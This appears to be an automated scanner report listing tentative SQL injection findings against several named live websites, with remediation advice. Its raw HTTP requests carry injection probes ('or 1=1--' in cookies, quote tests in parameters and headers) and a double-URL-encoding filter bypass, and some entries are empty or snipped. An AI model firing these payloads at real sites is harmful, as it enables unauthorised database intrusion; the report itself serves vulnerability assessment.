Stored XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, Blind SQl Injection, 09032011-02

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The acs cookie appears to be vulnerable to SQL injection attacks. The payloads 18652187'%20or%201%3d1--%20 and 18652187'%20or%201%3d2--%20 were each submitted in the acs cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt1018652187'%20or%201%3d1--%20; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: clid=2lqyje70117095fjndb6bb2p0000h02q6u2q102q92q; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u30arp9u303td9w00f7u9u307219w00a6p9w000kn9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: rdrlst=41l0sh6lqyjef0000001h6u1h0m79lqyjec0000001z6u1z0xv3lqyjec0000001y6u1y0m7dlqyjee0000001o6u1o16pilqyjea000000286u280x18lqyjee0000001p6u1p18ldlqyjeb000000276u270moulqyjee0000001n6u1n0moqlqyjeb000000226u2218etlqyjea000000286u280dhxlqyjea000000286u2818lqlqyjea000000296u291196lqyjea0000002c6u2c14khlqyjea000000286u2814hnlqyjea000000286u281195lqyjea0000002d6u2d1194lqyje90000002e6u2e00c1lqyjee0000001p6u1p1axvlqyjee0000001l6u1l1193lqyje90000002f6u2f1192lqyje70000002l6u2l10tylqyje90000002g6u2g0cablqyjee0000001p6u1p06pblqyjee0000001p6u1p07sylqyjee0000001p6u1p18w4lqyjef0000001k6u1k10telqyje80000002h6u2h16d5lqyjee0000001p6u1p159elqyjee0000001m6u1m10rdlqyje80000002i6u2i0m3zlqyjec000000206u200miwlqyjec000000216u211ad8lqyje80000002j6u2j18k9lqyjeb000000266u260m0slqyjee0000001q6u1q0m43lqyjed0000001r6u1r0m0olqyjeb000000236u231679lqyjed0000001s6u1s12qnlqyje70000002k6u2k0mjdlqyjeb000000246u240mjhlqyjed0000001t6u1t1671lqyjeb000000256u250lw4lqyjea000000286u280lm1lqyjed0000001u6u1u0rzglqyjef0000001i6u1i18kzlqyjea0000002a6u2a17gxlqyjea000000286u280lm5lqyjed0000001v6u1v0lltlqyjec0000001w6u1w0zpelqyjea000000286u280llxlqyjec0000001x6u1x18knlqyjea0000002b6u2b18hblqyjef0000001j6u1j0afolqyjee0000001p6u1p0kkjlqyjee0000001p6u1p14b
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt1018652187'%20or%201%3d2--%20; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: vstcnt=41bb010r064zbs2150v10023d7x118e10124fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: clid=2lqyje70117095fjndb6bb2p0000i02r6u2r102r92r; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: rdrlst=41l0sh6lqyjef0000001i6u1i0m79lqyjec000000206u200xv3lqyjec0000001z6u1z0m7dlqyjee0000001p6u1p16pilqyjea000000296u290x18lqyjee0000001q6u1q18ldlqyjeb000000286u280moulqyjee0000001o6u1o0moqlqyjeb000000236u2318etlqyjea000000296u290dhxlqyjea000000296u2918lqlqyjea0000002a6u2a14hnlqyjea000000296u2914khlqyjea000000296u291196lqyjea0000002d6u2d1195lqyjea0000002e6u2e1194lqyje90000002f6u2f00c1lqyjee0000001q6u1q1193lqyje90000002g6u2g1axvlqyjee0000001m6u1m1192lqyje70000002m6u2m10tylqyje90000002h6u2h0cablqyjee0000001q6u1q06pblqyjee0000001q6u1q07sylqyjee0000001q6u1q18w4lqyjef0000001l6u1l10telqyje80000002i6u2i16d5lqyjee0000001q6u1q159elqyjee0000001n6u1n10rdlqyje80000002j6u2j0m3zlqyjec000000216u210miwlqyjec000000226u221ad8lqyje80000002k6u2k18k9lqyjeb000000276u270m0slqyjee0000001r6u1r0m43lqyjed0000001s6u1s0m0olqyjeb000000246u241679lqyjed0000001t6u1t12qnlqyje70000002l6u2l0mjdlqyjeb000000256u250mjhlqyjed0000001u6u1u1671lqyjeb000000266u260lw4lqyjea000000296u290lm1lqyjed0000001v6u1v0rzglqyjef0000001j6u1j18kzlqyjea0000002b6u2b17gxlqyjea000000296u290lm5lqyjed0000001w6u1w0lltlqyjec0000001x6u1x0zpelqyjea000000296u290llxlqyjec0000001y6u1y18knlqyjea0000002c6u2c18hblqyjef0000001k6u1k0afolqyjee0000001q6u1q0kkjlqyjee0000001q6u1q14b
...[SNIP]...

1.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [uit cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ds.addthis.com
Path:	/red/psi/sites/vasco.com/p.json

Issue detail

The uit cookie appears to be vulnerable to SQL injection attacks. The payloads 97382001'%20or%201%3d1--%20 and 97382001'%20or%201%3d2--%20 were each submitted in the uit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1wh4476 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=197382001'%20or%201%3d1--%20

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:34 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:34 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071154.10R|1315071154.1FE|1315071154.1OD|1315071154.60|1315071154.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:34 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

Request 2

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:34 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:34 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:34 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

1.3. http://t4.trackalyzer.com/trackalyze.asp [i parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://t4.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The i parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the i parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /trackalyze.asp?r=None&p=http%3A//vasco.com/&i=10538' HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 03 Sep 2011 17:33:13 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Content-Length: 270
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fvasco%2Ecom%2F; expires=Sun, 04-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>
<p>
<font face="Arial" size=2>Type mismatch: 'cint'</font>
<p>
<font face="Arial" si
...[SNIP]...

Request 2

GET /trackalyze.asp?r=None&p=http%3A//vasco.com/&i=10538'' HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response 2

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 03 Sep 2011 17:33:14 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t4.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fvasco%2Ecom%2F; expires=Sun, 04-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t4.trackalyzer.com/0.gif">here</a>.</body>

1.4. http://www.cheapssls.com/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php'?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:00 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php''?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 2

1.5. http://www.cheapssls.com/index.php [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:29 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=1c2uhdfvhbepsaec7mkm3aing7; expires=Sat, 17-Sep-2011 21:55:29 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:28 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 2

1.6. http://www.cheapssls.com/index.php [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

